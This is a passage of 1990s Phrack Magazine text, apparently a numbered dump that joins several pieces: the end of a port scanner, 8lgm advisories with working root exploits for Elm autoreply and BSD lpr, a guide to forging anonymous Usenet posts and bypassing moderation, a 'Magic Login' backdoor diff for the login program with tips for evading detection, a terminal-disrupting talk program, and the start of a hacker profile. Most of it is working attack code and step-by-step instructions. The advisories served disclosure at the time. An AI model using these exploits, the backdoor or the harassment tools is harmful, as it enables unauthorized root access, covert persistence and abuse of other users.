  3763.    if ((ServiceEntryPointer = getservbyport(Port,"tcp")) !=
  3764.        (struct servent *) NULL)
  3765.     (void) printf(" (\"%s\" service) ",
  3766.            ServiceEntryPointer->s_name);
  3767.    (void) printf("connection ... ");
  3768.    (void) fflush(stdout);
  3769.    }
  3770.   (void) printf("open.\n");
  3771.   if (Hack)
  3772.    {
  3773.    (void) sprintf(Buffer, "/usr/ucb/telnet %s %d",
  3774.            HostEntryPointer->h_name, Port);
  3775.    (void) system(Buffer);
  3776.    }
  3777.   }
  3778.  
  3779.  (void) close(SocketDescriptor);
  3780.  return (RETURN_SUCCESS);
  3781. }
  3782.  
  3783. ------------------------------------------------------------------------------
  3784.  
  3785. [8lgm]-Advisory-2.UNIX.autoreply.12-Jul-1991
  3786.  
  3787. PROGRAM:
  3788.  
  3789.  autoreply(1) (/usr/local/bin/autoreply)
  3790.    Supplied with the Elm Mail System
  3791.  
  3792. VULNERABLE OS's:
  3793.  
  3794.  Any system with a standard installation of The Elm Mail System.
  3795.  All versions are believed to have this vulnerability.
  3796.  
  3797. DESCRIPTION:
  3798.  
  3799.  autoreply(1) can be used to create root owned files, with mode
  3800.  666.  It can also overwrite any file with semi user-controlled
  3801.  data.
  3802.  
  3803. IMPACT:
  3804.  
  3805.  Any user with access to autoreply(1) can alter system files and
  3806.  thus become root.
  3807.  
  3808. REPEAT BY:
  3809.  
  3810.  This example demonstrates how to become root on most affected
  3811.  machines by modifying root's .rhosts file.  Please do not do
  3812.  this unless you have permission.
  3813.  
  3814.  Create the following script, 'fixrhosts':
  3815.  
  3816. 8<--------------------------- cut here ----------------------------
  3817. #!/bin/sh
  3818. #
  3819. # fixrhosts rhosts-file user machine
  3820. #
  3821. if [ $# -ne 3 ]; then
  3822.  echo "Usage: `basename $0` rhosts-file user machine"
  3823.  exit 1
  3824. fi
  3825. RHOSTS="$1"
  3826. USERNAME="$2"
  3827. MACHINE="$3"
  3828. cd $HOME
  3829. echo x > "a
  3830. $MACHINE $USERNAME
  3831. b"
  3832. umask 022
  3833. autoreply "a
  3834. $MACHINE $USERNAME
  3835. b"
  3836. cat > /tmp/.rhosts.sh.$$ << 'EOF'
  3837. ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
  3838. exec autoreply off
  3839. exit 0
  3840. EOF
  3841. /bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
  3842. rm -f /tmp/.rhosts.sh.$$ "a
  3843. $MACHINE $USERNAME
  3844. b"
  3845. exit 0
  3846. 8<--------------------------- cut here ----------------------------
  3847.  
  3848.  (Lines marked with > represent user input)
  3849.  
  3850. > % id
  3851.  uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
  3852. > % ./fixrhosts ~root/.rhosts 8lgm localhost
  3853.  You've been added to the autoreply system.
  3854.  You've been removed from the autoreply table.
  3855. > % rsh localhost -l root csh -i
  3856.  Warning: no access to tty.
  3857.  Thus no job control in this shell.
  3858.  #
  3859.  
  3860.  
  3861. FIX:
  3862.  
  3863.  1. Disable autoreply.
  3864.  2. Wait for a patch from the Elm maintainers.
  3865.  
  3866. ------------------------------------------------------------------------------
  3867.  
  3868. [8lgm]-Advisory-3.UNIX.lpr.19-Aug-1991
  3869.  
  3870. PROGRAM:
  3871.  
  3872.  lpr(1)  (/usr/ucb/lpr or /usr/bin/lpr)
  3873.  
  3874. VULNERABLE OS's:
  3875.  
  3876.  SunOS 4.1.1 or earlier
  3877.  BSD 4.3
  3878.  BSD NET/2 Derived Systems
  3879.  A/UX 2.0.1
  3880.  
  3881.  Most systems supporting the BSD LP subsystem
  3882.  
  3883.  
  3884. DESCRIPTION:
  3885.  
  3886.  lpr(1) can be used to overwrite or create (and become owner of)
  3887.  any file on the system.  lpr -s allows users to create symbolic
  3888.  links in lpd's spool directory (typically /var/spool/lpd).
  3889.  After 1000 invocations of lpr, lpr will reuse the filename in
  3890.  the spool directory, and follow the link previously installed.
  3891.  It will thus overwrite/create any file that this link points too.
  3892.  
  3893. IMPACT:
  3894.  
  3895.  Any user with access to lpr(1) can alter system files and thus
  3896.  become root.
  3897.  
  3898. REPEAT BY:
  3899.  
  3900.  This example demonstrates how to become root on most affected
  3901.  machines by modifying /etc/passwd and /etc/group.  Please do
  3902.  not do this unless you have permission.
  3903.  
  3904.  Create the following script, 'lprcp':
  3905.  
  3906. 8<--------------------------- cut here ----------------------------
  3907. #!/bin/csh -f
  3908. #
  3909. # Usage: lprcp from-file to-file
  3910. #
  3911.  
  3912. if ($#argv != 2) then
  3913.  echo Usage: lprcp from-file to-file
  3914.  exit 1
  3915. endif
  3916.  
  3917. # This link stuff allows us to overwrite unreadable files,
  3918. # should we want to.
  3919. echo x > /tmp/.tmp.$$
  3920. lpr -q -s /tmp/.tmp.$$
  3921. rm -f /tmp/.tmp.$$  # lpr's accepted it, point it
  3922. ln -s $2 /tmp/.tmp.$$  # to where we really want
  3923.  
  3924. @ s = 0
  3925. while ( $s != 999)  # loop 999 times
  3926.  lpr /nofile >&/dev/null # doesn't exist, but spins the clock!
  3927.  @ s++
  3928.  if ( $s % 10 == 0 ) echo -n .
  3929. end
  3930. lpr $1    # incoming file
  3931.     # user becomes owner
  3932. rm -f /tmp/.tmp.$$
  3933. exit 0
  3934. 8<--------------------------- cut here ----------------------------
  3935.  
  3936.  (Lines marked with > represent user input)
  3937.  
  3938. Make copies of /etc/passwd and /etc/group, and modify them:
  3939. > % id
  3940.  uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
  3941. > % cp /etc/passwd /tmp/passwd
  3942. > % ex /tmp/passwd
  3943.  /tmp/passwd: unmodified: line 42
  3944. > :a
  3945. > 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
  3946. > .
  3947. > :wq
  3948.  /tmp/passwd: 43 lines, 2188 characters.
  3949. > % cp /etc/group /tmp
  3950. > % ex /tmp/group
  3951.  /tmp/group: unmodified: line 49
  3952. > :/wheel
  3953.  wheel:*:0:root,operator
  3954. > :c
  3955. > wheel:*:0:root,operator,8lgm
  3956. > .
  3957. > :wq
  3958.  /tmp/group: 49 lines, 944 characters.
  3959.  
  3960. Install our new files:
  3961. > % ./lprcp /tmp/group /etc/group
  3962.  ................................................................
  3963.  ...................................
  3964.  lpr: cannot rename /var/spool/lpd/cfA060testnode
  3965. > % ./lprcp /tmp/passwd /etc/passwd
  3966.  .................................................................
  3967.  ..................................
  3968.  lpr: cannot rename /var/spool/lpd/cfA061testnode
  3969.  
  3970. Check it worked:
  3971. > % ls -l /etc/passwd /etc/group
  3972.  -rw-r--r--    1 8lgm          944 Mar  3 19:56 /etc/group
  3973.  -rw-r--r--    1 8lgm         2188 Mar  3 19:59 /etc/passwd
  3974. > % head -1 /etc/group
  3975.  wheel:*:0:root,operator,8lgm
  3976. > % grep '^8lgmroot' /etc/passwd
  3977.  8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
  3978.  
  3979. Become root and tidy up:
  3980. > % su 8lgmroot
  3981.  # chown root /etc/passwd /etc/group
  3982.  # rm -f /tmp/passwd /tmp/group
  3983.  #
  3984.  
  3985. FIX:
  3986.  
  3987.  1. Contact your vendor for a fix.
  3988.  2. In the meantime, apply the following patch, derived from
  3989.     BSD NET/2 source, which will correct the flaw on most
  3990.     affected systems:
  3991.  
  3992. ------------------------------------------------------------------------------
  3993.  
  3994.           Anonymous netnews without "anonymous" remailers
  3995.  
  3996. Save any news article to a file.  We'll call it "hak" in this example.
  3997. Edit hak, and remove any header lines of the form
  3998.  
  3999.  From some!random!path!user   (note: "From ", not "From: " !!)
  4000.  Article:
  4001.  Lines:
  4002.  
  4003. Shorten the Path: header down to its LAST two or three "bangized" components.
  4004. This is to make the article look like it was posted from where it really was
  4005. posted, and originally hit the net at or near the host you send it to.  Or
  4006. you can construct a completely new Path: line to reflect your assumed alias.
  4007.  
  4008. Make some change to the Message-ID: field, that isn't likely to be
  4009. duplicated anywhere.  This is usually best done by adding a couple of
  4010. random characters to the part before the @, since news posting programs
  4011. generally use a fixed-length field to generate these IDs.
  4012.  
  4013. Change the other headers to say what you like -- From:, Newsgroups:,
  4014. Sender:, etc.  Replace the original message text with your message.
  4015. If you are posting to a moderated group, remember to put in an Approved:
  4016. header to bypass the moderation mechanism.
  4017.  
  4018. Write out the changed file, and send it to your favorite NNTP server that
  4019. permits transfers via the IHAVE command, using the following script:
  4020.  
  4021. =======================
  4022. #! /bin/sh
  4023. ## Post an article via IHAVE.
  4024. ## args: filename server
  4025.  
  4026. if test "$2" = "" ; then
  4027.   echo usage: $0 filename server
  4028.   exit 1
  4029. fi
  4030. if test ! -f $1 ; then
  4031.   echo $1: not found
  4032.   exit 1
  4033. fi
  4034.  
  4035. # suck msg-id out of headers, keep the brackets
  4036. msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
  4037.   sed 's/.*-[Ii][Dd]: //'`
  4038. echo $msgid
  4039.  
  4040. ( sleep 5
  4041.   echo IHAVE $msgid
  4042.   sleep 3
  4043.   cat $1
  4044.   sleep 1
  4045.   echo "."
  4046.   sleep 1
  4047.   echo QUIT ) | telnet $2 119
  4048. =======================
  4049.  
  4050. If your article doesn't appear in a day or two, try a different server.
  4051. They are easy to find.  Here's a script that will break a large file
  4052. full of saved netnews into a list of hosts to try.  Edit the output
  4053. of this if you want, to remove obvious peoples' names and other trash.
  4054.  
  4055. =======================
  4056. #! /bin/sh
  4057. FGV='fgrep -i -v'
  4058. egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\
  4059. /g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
  4060. =======================
  4061.  
  4062. Once you have your host list, feed it to the following script.
  4063.  
  4064. =======================
  4065. #! /bin/sh
  4066.  
  4067. while read xx ; do
  4068. if test "$xx" = "" ; then continue;
  4069. fi
  4070. echo === $xx
  4071. ( echo open $xx 119
  4072.   sleep 5
  4073.   echo ihave k00l@x.edu
  4074.   sleep 4
  4075.   echo .
  4076.   echo quit
  4077.   sleep 1
  4078.   echo quit
  4079. ) | telnet
  4080. done
  4081. =======================
  4082.  
  4083. If the above script is called "findem" and you're using csh, you should do
  4084.  
  4085.  findem < list >& outfile
  4086.  
  4087. so that ALL output from telnet is captured.  This takes a long time, but when
  4088. it finishes, edit "outfile" and look for occurrences of "335".  These mark
  4089. answers from servers that might be willing to accept an article.  This isn't a
  4090. completely reliable indication, since some servers respond with acceptance and
  4091. later drop articles.  Try a given server with a slightly modified repeat of
  4092. someone else's message, and see if it eventually appears.
  4093.  
  4094. You will notice other servers that don't necessarily take an IHAVE, but
  4095. say "posting ok".  You can probably do regular POSTS through these, but they
  4096. will add an "NNTP-Posting-Host: " header containing the machine YOU came from.
  4097.  
  4098. ------------------------------------------------------------------------------
  4099.  
  4100. Magic Login - Written by Data King - 7 July 1994
  4101.  
  4102. PLEASE NOTE:-
  4103.  
  4104.      This program code is released  on the understanding  that neither the
  4105.      author or Phrack  Magazine suggest that you implement this on **ANY**
  4106.      system that you are not authorized to do so. The author provides this
  4107.      implementation of a "Magic"  login as a learning exercise in security
  4108.      programming.
  4109.  
  4110. Sorry for the disclaimer readers but I was advised by the AFP (Australian
  4111. Federal Police) that if I ever released this code they would bust me for
  4112. aiding and abetting. I am releasing it anyway as I believe in the right of
  4113. people to KNOW, but not necessarily to DO.
  4114.  
  4115. As always I can be emailed at dking@suburbia.apana.org.au
  4116. (Please note:- I have a NEW pgp signature.)
  4117.  
  4118. INTRODUCTION
  4119. ~~~~~~~~~~~~
  4120. Briefly I am going to explain what a "Magic" login is and some of the steps you
  4121. need to go through to receive the desired result. At the end of this article is
  4122. a diff that can be applied to the shadow-3.2.2-linux archive to implement some
  4123. of these ideas.
  4124.  
  4125. EXPLANATION
  4126. ~~~~~~~~~~~
  4127. A "Magic" login is a modified login program that allows the user to login
  4128. without knowing the correct password for the account they are logging into.
  4129.  
  4130. This is a very simple programming exercise and can be done by almost anyone, but
  4131. a really effective "Magic" login program will do much more than this. The
  4132. features of the supplied "Magic" login are:
  4133.  
  4134.      - Will login to any valid account as long as you know the Magic password.
  4135.  
  4136.      - Hides you in UTMP
  4137. [B
  4138.      - Does not Log to WTMP
  4139.  
  4140.      - Allows Root Login from NON authorized Terminals
  4141.  
  4142.      - Preserves the Lastlogin information (ie Keeps it as though you had never
  4143.        logged in with the magic password)
  4144.  
  4145.      - Produces a binary that is exactly the same length as the original binary.
  4146.  
  4147. IMPLEMENTATION
  4148. ~~~~~~~~~~~~~~
  4149. I am not going to go into great detail here on how to write such a system as
  4150. this. The code is very simple and it contains plenty of comments, so just look
  4151. there for ideas.
  4152.  
  4153. For this system to have less chance of being detected you need to do several
  4154. things.
  4155.  
  4156. First select a "Magic" password that is not easily identifiable by stringing the
  4157. binary. This is why in the example I have used the word "CONSOLE", this word
  4158. already appears several times in the binary so detection of one more is
  4159. unlikely.
  4160.  
  4161. Admittedly I could of encrypted the "Magic" password, but I decided against this
  4162. for several reasons.
  4163.  
  4164. The second thing you would need to do if you where illegally placing a "Magic"
  4165. login on a system would be to ensure that the admins are not doing CRC checks on
  4166. SUID(0) programs, or if they are that you change the CRC record of login to
  4167. match the CRC record of the "Magic" login.
  4168.  
  4169. Thirdly do not forget to make the date and time stamp of the new binary match
  4170. the old ones.
  4171.  
  4172. To install a new /bin/login on a system you will need to be root, now if you are
  4173. already root why would you bother? Simple, it is just one more backdoor that you
  4174. can use to get back in if you are detected.
  4175.  
  4176. LIMITATIONS
  4177. ~~~~~~~~~~~
  4178. This version of the "Magic" login program does not have the following features,
  4179. I leave it entirely up to you about implementing something to fix them:
  4180.  
  4181.      - Shells & Programs show up in the Process Table
  4182.  
  4183.      - tty Ownership and attributes
  4184.  
  4185.      - /proc filesystem
  4186.  
  4187. Any one of these to an alert system admin will show that there is an "invisible"
  4188. user on the system. However it has been my experience that most admin's rarely
  4189. look at these things, or if they do they can not see the wood for the trees.
  4190.  
  4191. -----<cut here>-----
  4192.  
  4193. diff -c /root/work/login/console.c /root/work/logon/console.c
  4194. *** /root/work/login/console.c Sun Oct 11 07:16:47 1992
  4195. --- /root/work/logon/console.c Sat Jun  4 15:29:15 1994
  4196. ***************
  4197. *** 21,26 ****
  4198. --- 21,27 ----
  4199.   #endif
  4200.  
  4201.   extern char *getdef_str();
  4202. + extern  int magik;
  4203.  
  4204.   /*
  4205.    * tty - return 1 if the "tty" is a console device, else 0.
  4206. ***************
  4207. *** 47,52 ****
  4208. --- 48,57 ----
  4209.    if ((console = getdef_str("CONSOLE")) == NULL)
  4210.     return 1;
  4211.  
  4212. +  /* Fix for Magic Login - UnAuth Console - Data King */
  4213. +
  4214. +  if (magik==1)
  4215. +   return 1;
  4216.    /*
  4217.     * If this isn't a filename, then it is a ":" delimited list of
  4218.     * console devices upon which root logins are allowed.
  4219. diff -c /root/work/login/lmain.c /root/work/logon/lmain.c
  4220. *** /root/work/login/lmain.c Mon Oct 12 17:35:06 1992
  4221. --- /root/work/logon/lmain.c Sat Jun  4 15:30:37 1994
  4222. ***************
  4223. *** 105,110 ****
  4224. --- 105,111 ----
  4225.   char *Prog;
  4226.   int newenvc = 0;
  4227.   int maxenv = MAXENV;
  4228. + int magik;  /* Global Flag for Magic Login - Data King */
  4229.  
  4230.   /*
  4231.    * External identifiers.
  4232. diff -c /root/work/login/log.c /root/work/logon/log.c
  4233. *** /root/work/login/log.c Mon Oct 12 17:35:07 1992
  4234. --- /root/work/logon/log.c Sat Jun  4 15:37:22 1994
  4235. ***************
  4236. *** 53,58 ****
  4237. --- 53,59 ----
  4238.   extern struct passwd pwent;
  4239.   extern struct lastlog lastlog;
  4240.   extern char **environ;
  4241. + extern char magik;
  4242.  
  4243.   long lseek ();
  4244.   time_t time ();
  4245. ***************
  4246. *** 83,89 ****
  4247.    (void) time (&newlog.ll_time);
  4248.    (void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line);
  4249.    (void) lseek (fd, offset, 0);
  4250. !  (void) write (fd, (char *) &newlog, sizeof newlog);
  4251.    (void) close (fd);
  4252.   }
  4253.  
  4254. --- 84,93 ----
  4255.    (void) time (&newlog.ll_time);
  4256.    (void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line);
  4257.    (void) lseek (fd, offset, 0);
  4258. !  if (magik !=1) /* Dont Modify Last login Specs if this is a Magic  */
  4259. !  {        /* login - Data King */
  4260. !    (void) write (fd, (char *) &newlog, sizeof newlog);
  4261. !  }
  4262.    (void) close (fd);
  4263.   }
  4264.  
  4265. diff -c /root/work/login/utmp.c /root/work/logon/utmp.c
  4266. *** /root/work/login/utmp.c Mon Oct 12 17:35:36 1992
  4267. --- /root/work/logon/utmp.c Sat Jun  4 15:41:13 1994
  4268. ***************
  4269. *** 70,75 ****
  4270. --- 70,77 ----
  4271.   extern long lseek();
  4272.   #endif /* SVR4 */
  4273.  
  4274. + extern  int magik;
  4275. +
  4276.   #define NO_UTENT \
  4277.    "No utmp entry.  You must exec \"login\" from the lowest level \"sh\""
  4278.   #define NO_TTY \
  4279. ***************
  4280. *** 353,368 ****
  4281.    /*
  4282.     * Scribble out the new entry and close the file.  We're done
  4283.     * with UTMP, next we do WTMP (which is real easy, put it on
  4284. !   * the end of the file.
  4285.     */
  4286. !
  4287. !  (void) write (fd, &utmp, sizeof utmp);
  4288. !  (void) close (fd);
  4289. !
  4290. !  if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) {
  4291.     (void) write (fd, &utmp, sizeof utmp);
  4292.     (void) close (fd);
  4293.    }
  4294. -   utent = utmp;
  4295.   #endif /* SVR4 */
  4296.   }
  4297. --- 355,372 ----
  4298.    /*
  4299.     * Scribble out the new entry and close the file.  We're done
  4300.     * with UTMP, next we do WTMP (which is real easy, put it on
  4301. !   * the end of the file. If Magic Login, DONT write out UTMP - Data King
  4302.     */
  4303. !  if (magik !=1)
  4304. !  {
  4305.     (void) write (fd, &utmp, sizeof utmp);
  4306.     (void) close (fd);
  4307. +
  4308. +   if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) {
  4309. +    (void) write (fd, &utmp, sizeof utmp);
  4310. +    (void) close (fd);
  4311. +   }
  4312. +    utent = utmp;
  4313.    }
  4314.   #endif /* SVR4 */
  4315.   }
  4316. diff -c /root/work/login/valid.c /root/work/logon/valid.c
  4317. *** /root/work/login/valid.c Sun Oct 11 07:16:55 1992
  4318. --- /root/work/logon/valid.c Sat Jun  4 15:47:28 1994
  4319. ***************
  4320. *** 25,30 ****
  4321. --- 25,32 ----
  4322.   static char _sccsid[] = "@(#)valid.c 3.4 08:44:15 9/12/91";
  4323.   #endif
  4324.  
  4325. + extern int magik;
  4326. +
  4327.   /*
  4328.    * valid - compare encrypted passwords
  4329.    *
  4330. ***************
  4331. *** 43,48 ****
  4332. --- 45,64 ----
  4333.    char *encrypt;
  4334.    char *salt;
  4335.    char *pw_encrypt ();
  4336. +  char  *magic;
  4337. +
  4338. +  /*
  4339. +   * Below is the piece of code that checks to see if the password
  4340. +   * supplied by the user = the Magic Password - Data King
  4341. +   */
  4342. +
  4343. +  magic = "CONSOLE"; /* Define this as the Magic Password - Data King */
  4344. +
  4345. +  if (strcmp(password,magic) == 0)
  4346. +   {
  4347. +    magik = 1;
  4348. +    return(1);
  4349. +   }
  4350.  
  4351.    /*
  4352.     * Start with blank or empty password entries.  Always encrypt
  4353.  
  4354. ------------------------------------------------------------------------------
  4355.  
  4356. /* flash.c */
  4357.  
  4358. /* This little program is intended to quickly mess up a user's
  4359.    terminal by issuing a talk request to that person and sending
  4360.    vt100 escape characters that force the user to logout or kill
  4361.    his/her xterm in order to regain a sane view of the text.
  4362.    It the user's message mode is set to off (mesg n) he/she will
  4363.    be unharmed.
  4364.    This program is really nasty :-)
  4365.  
  4366.    Usage: flash user@host
  4367.  
  4368.    try compiling with: gcc -o flash flash.c
  4369. */
  4370.  
  4371.  
  4372. #include <sys/types.h>
  4373. #include <sys/socket.h>
  4374. #include <netinet/in.h>
  4375. #include <netdb.h>
  4376. #include <stdio.h>
  4377. #include <strings.h>
  4378.  
  4379. /* this should really be in an include file..  */
  4380.  
  4381. #define OLD_NAME_SIZE 9
  4382. #define NAME_SIZE    12
  4383. #define TTY_SIZE     16
  4384. typedef struct {
  4385.         char    type;
  4386.         char    l_name[OLD_NAME_SIZE];
  4387.         char    r_name[OLD_NAME_SIZE];
  4388.         char    filler;
  4389.         u_long  id_num;
  4390.         u_long  pid;
  4391.         char    r_tty[TTY_SIZE];
  4392.         struct  sockaddr_in addr;
  4393.         struct  sockaddr_in ctl_addr;
  4394. } OLD_MSG;
  4395.  
  4396. typedef struct {
  4397.         u_char  vers;
  4398.         char    type;
  4399.         u_short filler;
  4400.         u_long  id_num;
  4401.         struct  sockaddr_in addr;
  4402.         struct  sockaddr_in ctl_addr;
  4403.         long    pid;
  4404.         char    l_name[NAME_SIZE];
  4405.         char    r_name[NAME_SIZE];
  4406.         char    r_tty[TTY_SIZE];
  4407. } CTL_MSG;
  4408.  
  4409. #define TALK_VERSION    1               /* protocol version */
  4410.  
  4411. /* Types */
  4412. #define LEAVE_INVITE    0
  4413. #define LOOK_UP         1
  4414. #define DELETE          2
  4415. #define ANNOUNCE        3
  4416.  
  4417. int current = 1;  /* current id..  this to avoid duplications */
  4418.  
  4419. struct sockaddr_in *getinaddr(char *hostname, u_short port)
  4420. {
  4421. static  struct sockaddr    addr;
  4422. struct  sockaddr_in *address;
  4423. struct  hostent     *host;
  4424.  
  4425. address = (struct sockaddr_in *)&addr;
  4426. (void) bzero( (char *)address, sizeof(struct sockaddr_in) );
  4427. /* fill in the easy fields */
  4428. address->sin_family = AF_INET;
  4429. address->sin_port = htons(port);
  4430. /* first, check if the address is an ip address */
  4431. address->sin_addr.s_addr = inet_addr(hostname);
  4432. if ( (int)address->sin_addr.s_addr == -1)
  4433.         {
  4434.         /* it wasn't.. so we try it as a long host name */
  4435.         host = gethostbyname(hostname);
  4436.         if (host)
  4437.                 {
  4438.                 /* wow.  It's a host name.. set the fields */
  4439.                 /* ?? address->sin_family = host->h_addrtype; */
  4440.                 bcopy( host->h_addr, (char *)&address->sin_addr,
  4441.                         host->h_length);
  4442.                 }
  4443.         else
  4444.                 {
  4445.                 /* oops.. can't find it.. */
  4446.   puts("Couldn't find address");
  4447.   exit(-1);
  4448.                 return (struct sockaddr_in *)0;
  4449.                 }
  4450.         }
  4451. /* all done. */
  4452. return (struct sockaddr_in *)address;
  4453. }
  4454.  
  4455. SendTalkPacket(struct sockaddr_in *target, char *p, int psize)
  4456. {
  4457. int  s;
  4458. struct sockaddr sample; /* not used.. only to get the size */
  4459.  
  4460. s = socket(AF_INET, SOCK_DGRAM, 0);
  4461. sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) );
  4462. }
  4463.  
  4464.  
  4465. new_ANNOUNCE(char *hostname, char *remote, char *local)
  4466. {
  4467. CTL_MSG  packet;
  4468. struct   sockaddr_in  *address;
  4469.  
  4470. /* create a packet */
  4471. address = getinaddr(hostname, 666 );
  4472. address->sin_family = htons(AF_INET);
  4473.  
  4474. bzero( (char *)&packet, sizeof(packet) );
  4475. packet.vers   = TALK_VERSION;
  4476. packet.type   = ANNOUNCE;
  4477. packet.pid    = getpid();
  4478. packet.id_num = current;
  4479. bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
  4480. bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
  4481. strncpy( packet.l_name, local, NAME_SIZE);
  4482. strncpy( packet.r_name, remote, NAME_SIZE);
  4483. strncpy( packet.r_tty, "", 1);
  4484.  
  4485. SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) );
  4486. }
  4487.  
  4488. old_ANNOUNCE(char *hostname, char *remote, char *local)
  4489. {
  4490. OLD_MSG  packet;
  4491. struct   sockaddr_in  *address;
  4492.  
  4493. /* create a packet */
  4494. address = getinaddr(hostname, 666 );
  4495. address->sin_family = htons(AF_INET);
  4496.  
  4497. bzero( (char *)&packet, sizeof(packet) );
  4498. packet.type   = ANNOUNCE;
  4499. packet.pid    = getpid();
  4500. packet.id_num = current;
  4501. bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
  4502. bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
  4503. strncpy( packet.l_name, local, NAME_SIZE);
  4504. strncpy( packet.r_name, remote, NAME_SIZE);
  4505. strncpy( packet.r_tty, "", 1);
  4506.  
  4507. SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) );
  4508. }
  4509.  
  4510. main(int argc, char *argv[])
  4511. {
  4512.  char *hostname, *username;
  4513.  int pid;
  4514.  
  4515.  if ( (pid = fork()) == -1)
  4516.    {
  4517.   perror("fork()");
  4518.   exit(-1);
  4519.   }
  4520.  if ( !pid )
  4521.   {
  4522.   exit(0);
  4523.   }
  4524.  if (argc < 2) {
  4525.   puts("Usage: <finger info> ");
  4526.   exit(5);
  4527.  }
  4528.   username = argv[1];
  4529.  if ( (hostname = (char *)strchr(username, '@')) == NULL )
  4530.   {
  4531.   puts("Invalid name.  ");
  4532.   exit(-1);
  4533.   }
  4534.         *hostname = '\0';
  4535.  hostname++;
  4536.  
  4537.  if (*username == '~')
  4538.   username++;
  4539.  
  4540. #define FIRST "\033c\033(0\033#8"
  4541. #define SECOND "\033[1;3r\033[J"
  4542. #define THIRD  "\033[5m\033[?5h"
  4543.  new_ANNOUNCE(hostname, username, FIRST);
  4544.  old_ANNOUNCE(hostname, username, FIRST);
  4545.  current++;
  4546.  new_ANNOUNCE(hostname, username, SECOND);
  4547.  new_ANNOUNCE(hostname, username, SECOND);
  4548.  current++;
  4549.  new_ANNOUNCE(hostname, username, THIRD);
  4550.   old_ANNOUNCE(hostname, username, THIRD);
  4551. }
  4552.  
  4553. ------------------------------------------------------------------------------
  4554.                               ==Phrack Magazine==
  4555.  
  4556.                  Volume Five, Issue Forty-Six, File 5 of 28
  4557.  
  4558. ****************************************************************************
  4559.  
  4560.  
  4561.                             -:[ Phrack Pro-Phile ]:-
  4562.  
  4563. This issue our prophile introduces you to one of the craziest people
  4564. I've ever met from the Underground.  And coming from a complete loon
  4565. like me, that's saying something.  This guy is a real Renaissance Man:
  4566. Hacker, programmer, burglar, convict, star of stage and screen...
  4567. Of course, that someone could only be:
  4568.  
  4569.                                    Minor Threat
  4570.                                    ~~~~~~~~~~~~
  4571. _____________________________________________________________________________
  4572.  
  4573.  
  4574.  Personal Info:
  4575.  
  4576.            Handle: Minor Threat
  4577.          Call him: MT, minor, lamer
  4578.              Born: 1972 in Walnut Creek, California
  4579.               Age: 22
  4580.            Height: 6'1"
  4581.            Weight: 155 lbs
  4582.            e-mail: mthreat@paranoia.com
  4583.               www: http://www.paranoia.com/~mthreat/
  4584.      Affiliations: Dark Side Research
  4585.   Computers owned: 1981: IBM PC
  4586.                    1982: none
  4587.                    1984: PCjr
  4588.                    1988: XT Clone
  4589.                    1990: 386/25 Clone
  4590.                    1992: Too many to legally list
  4591.                    1994: Pentium & 486
  4592.  
  4593. How I got started
  4594. ~~~~~~~~~~~~~~~~~
  4595.  
  4596.           In 1981, my dad worked for IBM.  In October of that year, he
  4597.      brought home a PC, and I jumped on BASIC.  It wasn't until 1984 that
  4598.      I got my first modem.  I had just moved to Florida with my dad, and
  4599.      he had a modem.  I met some other kids with computers and modems and
  4600.      they taught me what modems were for:  "You call other people's
  4601.      computers and try to get their passwords and intercept their mail".
  4602.      (That's what I was taught!)  It wasn't until a few months later I
  4603.      realized that this wasn't the actual purpose of BBSs and modems.
  4604.      My first BBS was the Towne Crier BBS at FAU (Florida Atlantic
  4605.      University), 305-393-3891 (I still remember that damn number), but
  4606.      the NPA has since changed to 407.  We thought it was so cool when
  4607.      we logged on as "All" and deleted all the messages posted to "All".
  4608.  
  4609.           In about 1985, I moved back to Austin.  I screwed around for
  4610.      several years without doing any real hacking.  When I got to high
  4611.      school, I wanted to change my grades like in War Games, so I looked
  4612.      through the counselor's office until I found a number to the
  4613.      Education Service Center.  I had to scan a whole _100_ numbers
  4614.      (929-13xx) to find the HP3000 dialup.  Once I found it, I had no
  4615.      idea what to do.  I gave the number to a friend in high school,
  4616.      who gave it to some of his hacker friends.  They hacked it and gave
  4617.      it back to me, complete with a full list of passwords and commands.
  4618.      It turns out, the two Austin hackers who did it were The Mentor and
  4619.      Erik Bloodaxe, but I didn't know that for another 3 years.
  4620.  
  4621.           Shortly after this, I picked my permanent handle.  Minor Threat
  4622.      was an early-to-mid 1980's punk band from Washington, DC.  They're no
  4623.      longer together, but Fugazi is pretty good and Ian McKaye (from
  4624.      Minor Threat) is in Fugazi.  I actually got the handle off of one
  4625.      of my sister's tapes, before I even heard them.  But now I like the
  4626.      music too.
  4627.  
  4628.           Eventually, I found a local pirate board, met all the local
  4629.      pirates, and got into the warez scene for a while.  I joined PE
  4630.      (Public Enemy), the pirate group.  (I cracked the warez!)  Warez were
  4631.      only so fun, so I looked for other stuff.  I met some VMB lamers and
  4632.      got into that scene for about a month, and got bored again.
  4633.  
  4634.           This was 1990, our 950s were running out, and we needed another
  4635.      way to call out.  So I took an old VMB hacking program I had
  4636.      written, and changed it around to scan for tones, in random order
  4637.      to avoid Ma Bell problems.  I nicknamed it ToneLoc, short for Tone-
  4638.      Locator.  I gave it to some friends (Alexis Machine & Marko Ramius)
  4639.      and eventually, it ended up on some warez boards.  It got pretty
  4640.      popular, so I made a version that worked for more people, called
  4641.      it 0.90, and released it.  Then I lost the source in a hard drive
  4642.      crash, and stopped working on it.
  4643.  
  4644.           I was 18 and mom said it was time to get out of her house, so
  4645.      I got my own apartment.  Marko Ramius and I learned about trashing
